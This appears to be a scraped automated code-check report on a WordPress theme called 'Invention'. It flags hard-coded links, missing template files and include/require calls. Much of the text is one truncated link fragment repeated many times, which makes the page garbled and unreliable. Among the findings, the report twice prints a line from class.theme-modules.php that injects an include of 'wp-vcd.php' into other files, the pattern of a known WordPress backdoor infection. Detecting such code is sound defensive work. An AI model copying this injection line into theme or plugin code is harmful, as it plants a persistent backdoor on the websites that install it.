href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1745: <small><?php _e('define main area directions, get it by address from here : ', 'jozoorthemes'); ?><a href='http://www.mapcoordinates.net' target='_blank'>mapcoordinates.net</a></smal1774: <small><?php _e('add address markers directions, get it by address from here : ', 'jozoorthemes'); ?><a href='http://www.mapcoordinates.net' target='_blank'>mapcoordinates.net</a></smal1745: <small><?php _e('define main area directions, get it by address from here : ', 'jozoorthemes'); ?><a href='http://www.mapcoordinates.net' target='_blank'>mapcoordinates.net</a></smal1774: <small><?php _e('add address markers directions, get it by address from here : ', 'jozoorthemes'); ?><a href='http://www.mapcoordinates.net' target='_blank'>mapcoordinates.net</a></smal189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an189: <small><a href='http://daneden.github.io/animate.css/' target='_blank'>'.__('See all animat257: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an407: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an536: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an624: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an742: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an829: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an901: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an983: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1069: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1155: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1219: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1480: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1552: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1661: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1710: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1846: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1916: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an1988: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2058: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2123: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all an2183: <small><a href='http://daneden.github.io/animate.css/' target='_blank'><?php _e('See all anPossible hard-coded links were found in the file options.php.30: <li><a href='http://themes.jozoor.com/wp/invention' target='_blank' ><span class='home'>31: <li><a href='http://themes.jozoor.com/wp/invention/docs' target='_blank' ><span class='d31: <li><a href='http://themes.jozoor.com/wp/invention/docs' target='_blank' ><span class='d32: <li><a href='http://support.jozoor.com/categories/invention-wordpress' target='_blank' c
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  8. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : footer-shop.php 1: <?php include (get_template_directory() . '/inc/theme-options.php'); // get all t10: <?php include (get_template_directory() . '/inc/switcher.php'); ?>14: <?php include (get_template_directory() . '/inc/under-construction-js.php'); ?>222: <?php include (get_template_directory() . '/inc/custom-js.php'); ?>225: <?php include (get_template_directory() . '/inc/switcher.php'); ?> If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : bootstrap.php 9: require_once 'constant.php';14: require_once 'autoload.php';30: require_once($datasource); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : custom.css.php 9: require_once( $path_to_wp . '/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : header.php 1: <?php include (get_template_directory() . '/inc/theme-options.php'); // get all t56: else { if (current_user_can('administrator')){ } else { include (get_template_directory() . '/inc/under_construction.php'); die(); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : header-shop.php 1: <?php include (get_template_directory() . '/inc/theme-options.php'); // get all t56: else { if (current_user_can('administrator')){ } else { include (get_template_directory() . '/inc/under_construction.php'); die(); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : latest-tweets.php 60: include (get_template_directory() . '/inc/twitteroauth/twitteroauth.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : shortcode-generator.php 7: require_once( $path_to_wp . '/wp-load.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-tgm-plugin-activation.php 1073: require_once( ABSPATH . 'wp-admin/includes/class-wp-list-table.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : twitteroauth.php 10: require_once('OAuth.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : init.php 220: @include( $file ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : footer.php 1: <?php include (get_template_directory() . '/inc/theme-options.php'); // get all t10: <?php include (get_template_directory() . '/inc/switcher.php'); ?>14: <?php include (get_template_directory() . '/inc/under-construction-js.php'); ?>222: <?php include (get_template_directory() . '/inc/custom-js.php'); ?>225: <?php include (get_template_directory() . '/inc/switcher.php'); ?> If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : functions.load.php 10: require_once( ADMIN_PATH . 'functions/functions.php' );11: require_once( ADMIN_PATH . 'functions/functions.filters.php' );12: require_once( ADMIN_PATH . 'functions/functions.interface.php' );13: require_once( ADMIN_PATH . 'functions/functions.options.php' );14: require_once( ADMIN_PATH . 'functions/functions.admin.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : functions.interface.php 86: include_once( ADMIN_PATH . 'front-end/options.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class.theme-modules.php 48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : index.php 80: require_once ( ADMIN_PATH . 'functions/functions.load.php' );81: require_once ( ADMIN_PATH . 'classes/class.options_machine.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes